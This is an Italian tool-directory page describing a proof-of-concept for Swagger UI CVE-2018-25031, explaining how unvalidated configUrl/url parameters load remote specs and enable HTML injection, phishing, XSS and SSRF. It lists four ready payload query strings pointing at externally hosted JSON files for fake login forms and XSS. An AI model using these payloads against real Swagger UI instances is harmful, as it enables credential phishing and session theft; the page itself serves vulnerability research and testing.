Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
Strumenti/GitHubGitHub/relichunt3r/swagger-ui
Strumenti di PhishingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Introduzione: Il ruolo di Swagger UI

Swagger UI è una libreria ampiamente utilizzata che rende le specifiche OpenAPI (precedentemente Swagger) in un'interfaccia web interattiva. Consente a sviluppatori e integratori di esplorare e testare le API senza avere l'implementazione backend in atto.

Dettagli CVE‑2018‑25031

La causa principale: Caricamento remoto delle specifiche

La vulnerabilità deriva da una validazione insufficiente dei parametri di query URL utilizzati per caricare file di configurazione o specifiche remoti dal client Swagger UI. I parametri comuni coinvolti sono:

  • ?url=.yaml
  • ?configUrl=.json

Un attaccante può puntare questi parametri verso una definizione OpenAPI o un file di configurazione controllato dall'attaccante e ospitato in remoto, che potrebbe essere renderizzato da un'istanza vulnerabile.

Potenziali vettori di attacco

Il caricamento di un file remoto malevolo può abilitare diversi esiti di alto impatto in base alla configurazione di hosting e alle salvaguardie in atto:

  1. Iniezione HTML (HTMLi) / Phishing - i file iniettati possono contenere HTML arbitrario che visualmente spaccia contenuti (ad esempio, falsi moduli di login), abusando del dominio fidato di un'istanza self-hosted.
  2. Cross‑Site Scripting (XSS) - se il contenuto iniettato include JavaScript eseguibile, può risultare in DOM XSS e consentire il furto di sessioni o azioni per conto degli utenti.
  3. Server‑Side Request Forgery (SSRF) - quando i server recuperano specifiche remote per conto del client, un attaccante può costringere il server a effettuare richieste verso endpoint interni, potenzialmente esponendo risorse sensibili.

Riferimenti:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

Proof‑of‑Concept (POC)

Payload

1 - Login

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - Remote Login

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - Immagine

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 Dichiarazione di non responsabilità

Il contenuto di questo repository è fornito solo a scopo educativo e informativo. L'autore non è responsabile per qualsiasi uso improprio. Assicurati di avere la debita autorizzazione prima dell'uso, agisci in modo responsabile a tuo rischio e segui tutte le linee guida legali ed etiche.

Scarica lo strumento